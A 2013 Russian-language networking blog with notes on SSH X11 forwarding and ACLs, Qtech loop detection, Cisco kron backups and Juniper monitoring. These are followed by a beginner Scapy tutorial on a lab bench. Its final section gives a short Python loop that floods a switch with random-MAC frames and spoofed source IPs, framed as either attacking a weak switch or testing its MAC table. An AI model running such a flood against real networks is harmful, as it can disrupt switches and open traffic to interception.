среда, 29 мая 2013 г.

SSH Ubuntu

SSH
apt-get install ssh
cd /etc/ssh/
ssh-config - включаем ForwardX11 yes ForwardX11Trusted yes
sshd-config - включаем X11Forwarding yes X11DisplayOffset 10 X11UseLocalhost yes

Перезапускаем процессsudo /etc/init.d/ssh restart

Настройка ACL
/etc/ssh/sshd_config - прописываем
AllowUsers hacker@* - юзер для которого открываем доступ
AllowUsers *@192.168.1.*  - ip-адрес для которого открываем доступ

Для запуска приложений с графическим интерфейсом надо по ssh с ключом X:
ssh -X user@192.168.1.1
Затем прописать необходимое приложение с знаком "&"
gns &
 


вторник, 28 мая 2013 г.

loop-detection

Qtech 2800:


Interface Ethernet1/1
 switchport mode trunk
 switchport trunk allowed vlan 1-3
 loopback-detection specified-vlan 1-3
 loopback-detection control shutdown

loopback-detection control-recovery timeout 10

воскресенье, 26 мая 2013 г.

среда, 1 мая 2013 г.

Создание автоматического backup на Cisco с помощью cron


Router1(config)#kron policy-list backup
Router1(config-kron-policy)#cli copy running-config ftp://ftp.xgu.ru
Router1(config)#kron occurrence daily-backup at 14:33 recurring
Router1(config-kron-occurrence)#policy-list backup

Данные команды не проверялись, оставил для себя на будущую проверку.

Juniper

Интересные команды на Juniper.

monitor interface ge-0/0/0
Данная команда выводит статистики Входящих/Исходящих пакетов для интерфейса в реальном времени.

monitor traffic interface ge-0/0/0
Сниффер, напоминающий tcpdump на linux.

Cisco имеет подобный функционал:

show inter ser0/0 | i ^ *.[0-9] packets

monitor capture

Сетевой скальпель (Scapy)


Добрый день.
Сегодня мы познакомимся с работой программы scapy. Немного теории о этой замечательной программе:

Scapy — сетевая утилита написанная на языке Python, которая позволяет посылать, просматривать и анализировать сетевые пакеты. В отличии от многих других утилит, утилита Scapy не ограничена только теми протоколами, пакеты которых она может генерировать. Фактически, она позволяет создавать любые пакеты и комбинировать атаки различных типов. 
( взято с http://xgu.ru/wiki/Scapy ) 

От себя дополню то, что это программа работает как под Linux, так и под Windows.
Существуют отличные статьи, где расписан подробно весь или почти весь функционал этой замечательной программы ( см. ниже), но мы с вами разберем базовые вопросы и примеры работы этой программы.

И так первым делом для наблюдения работы данной программы нам понадобится небольшой стенд (реальный или виртуальный выбирать вам, тестировал на реальном). Из ПО я взял обе машины на базе Ubuntu с установленными Wireshark и Scapy.



На данном этапе я думаю стоит сделать паузу и рассказать о "тонкостях" установки и работы этих замечательных программ на OC Ubuntu.

Wireshark ставится или с центра обновления или через консоль командой

sudo apt-get install wireshark

Однако если вы запускаете Wireshark и заметили, что у вас нет интерфейсов - то необходимо знать, что wireshark необходимо запускать с консоли от рута)

sudo wireshark.

Теперь необходимо разобраться с Scapy. Я пробовал найти и поставить прямой deb пакет, но то ли от кривизны моих рук (небольшой опыт в linux), то ли еще что ... Я нашел еще один способом

sudo apt-get update sudo apt-get install python-scapy python-pyx python-gnuplot

Затем мы запускаем сам Scapy. 

sudo scapy
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>>


Это как бы консоль  Scapy.


>>>quit() 
That's all! See you.


Ну вот мы и установили интересующие нас программы и собрали схему.
Начнем с простого: запустим 1 фрейм, да да фрейм, scapy не нужны заголовки 3го уровня ( см. OSI модель).

sendp(Ether(src=srcMAC, dst=dstMAC) - проще некуда)

В данной команде мы видим "оператор" sendp - который осуществляет отсылку фрейма/пакета. Значения src и dst, указывают mac-адреса того кто отправил и того кто принял, то есть в нашем случае здесь будут вместо srcMAC mac-адрес нашего компьютера с scapy, а в dstMAC mac-адрес компьютера с Wireshark.

Пример:



Мы видим, что фрейм ушел. От нашего устройства, другому устройству.
Самый большой плюс, что вместо mac-адреса источника можно указать любой адрес) 


Если мы укажем вместо адреса назначения адреса броадкаста (ff:ff:ff:ff:ff:ff), то при попадании в интерфейс коммутатора, он пойдет во все интерфейсы (ну что и логично). Также можно и не указывать адрес назначения, в этом случае фрейм полетит автоматически броадкастом. 

А теперь мы с вами прикрутим к пакету заголовок 3 уровня. 




Теперь перейдем к практическому применению этой программы. Допустим нам надо атаковать слабозащишенный коммутатор или проверить его заявленные требования по кол-ву обучаемых mac-адресов.

Для этого бы вводим несколько новых строчек.

Первым делом нам нужно сделать цикл в котором будет реализованна функция случайного значения.


import time
for n in xrange(1000) :
  srcMAC = "00"+str(RandMAC())[2:]

Затем если мы атакуем/тестируем конкретный mac-адрес, то мы дописываем строчку

  dstMAC = "70:72:CF:00:57:6A" , однако я использовал только броадкаст.

Затем переменной присвоим строчку

pkt = Ether(src=srcMAC, dst=dstMAC)/IP(src="133.0.0.1",dst="10.10.10.10")/Padding(load="X"*124)


и конечно же пропишем команду для отправки этой переменной ( то есть составленного нами пакета)

  sendp(pkt)

Как дополнительные функции укажем

srcMAC + " " + str(n)
time.sleep(0.1)

Здесь и так все понятно.

В целом конфигурация имеет вид:

import time
for n in xrange(1000) :
  srcMAC = "00"+str(RandMAC())[2:]
  dstMAC = "70:72:CF:00:57:6A"
  pkt = Ether(src=srcMAC, dst=dstMAC)/IP(src="133.0.0.1",dst="10.10.10.10")/Padding(load="X"*124)
  srcMAC + " " + str(n)
  sendp(pkt)
  time.sleep(0.1)

Конечно это базовые вещи, да и цель статьи на понимание базовых вещей программы.
Я надеюсь кому-то это статья будет полезна. более полные и действительно интересные программы реализованные в данной программе можете найти по ссылкам ниже. Спасибо за внимание. С уважением MonaxGT.

Если у Вас есть желания отблагодарить еще и денежно, можете кинуть монет на 41001601023715 .

http://samiux.blogspot.ru/2012/05/howto-scapy-220-on-ubuntu-1204-lts.html
http://www.xakep.ru/magazine/xa/126/028/1.asp
http://xgu.ru/wiki/Scapy
http://www.secdev.org/projects/scapy/doc/